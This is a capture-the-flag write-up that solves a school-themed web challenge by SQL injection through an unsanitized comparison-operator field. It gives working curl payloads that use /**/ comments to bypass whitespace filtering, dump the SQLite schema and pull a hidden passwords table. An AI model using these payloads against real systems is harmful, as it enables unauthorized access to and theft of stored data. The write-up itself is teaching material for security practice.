There’s been some weird occurrences going on at our school. Teacher’s answer questions as though they knew the answer in advance, test results being handed out before the test, and now a weird web form giving info about us. Can you find out what weird information is on it?

Find the page at

Challenge Overview

The website is a simple interface to a database. It is possible to search for students using the following fileds:

  • First name
  • Last name
  • Test score
  • Class
  • DOB (Date of Birth)

Depending on the field, users must specify a value and a comparison operator among >, <, =.


It is pretty easy to figure out that the comparison operator is not properly sanitized. This curl example dumps part of query string, exposing the placeholder used to handle the score value.

0 $ curl -d "score=92&ineq==1'" ''
{"user": "sqliteadmin@localhost", "error": "unrecognized token: \"' ?\""}

Whitespaces appears to be trimmed by the webserver, hence a common bypass is to separate query tokens using inline comments like /**/. Since the DBMS employed is SQLite, one can retrieve the whole db schema in one-shot dumping the sql field from the sqlite_master table.

0 $ curl -d "score=92&ineq==1/**/union/**/select/**/sql,1,1,1/**/from/**/sqlite_master/**/limit ? -- " ''
[["CREATE TABLE s3ekr17_passwords(\n\tuserid real,\n\tpassword text\n)", 1, 1, 1], ["CREATE TABLE students(\n\tuserid real,\n\tfirstname text,\n\tlastname text,\n\tscore real,\n\tteacher real,\n\tclass text,\n\tdate_birth date,\n\tdate_death date\n)", 1, 1, 1]]

Now, it’s enough to access s3ekr17_passwords.password to solve the challenge.

0 $ curl -d "score=92&ineq==1/**/union/**/select/**/userid,password,1,1/**/from/**/s3ekr17_passwords/**/limit ? -- " ''
[[0.0, "9", 1, 1], [1.0, "4", 1, 1], [2.0, "4", 1, 1], [3.0, "7", 1, 1], [4.0, "{", 1, 1], [5.0, "u", 1, 1], [6.0, "S", 1, 1], [7.0, "e", 1, 1], [8.0, "r", 1, 1], [9.0, "A", 1, 1], [10.0, "g", 1, 1], [11.0, "e", 1, 1], [12.0, "n", 1, 1], [13.0, "T", 1, 1], [14.0, "s", 1, 1], [15.0, "_", 1, 1], [16.0, "a", 1, 1], [17.0, "N", 1, 1], [18.0, "d", 1, 1], [19.0, "_", 1, 1], [20.0, "s", 1, 1], [21.0, "p", 1, 1], [22.0, "a", 1, 1], [23.0, "C", 1, 1], [24.0, "e", 1, 1], [25.0, "s", 1, 1], [26.0, "_", 1, 1], [27.0, "a", 1, 1], [28.0, "R", 1, 1], [29.0, "e", 1, 1], [30.0, "_", 1, 1], [31.0, "p", 1, 1], [32.0, "e", 1, 1], [33.0, "a", 1, 1], [34.0, "s", 1, 1], [35.0, "A", 1, 1], [36.0, "n", 1, 1], [37.0, "t", 1, 1], [38.0, "_", 1, 1], [39.0, "R", 1, 1], [40.0, "a", 1, 1], [41.0, "c", 1, 1], [42.0, "E", 1, 1], [43.0, "s", 1, 1], [44.0, "}", 1, 1]]

Let’s show some respect for the poor flag, really.

>>> ''.join(x[1] for x in query_result)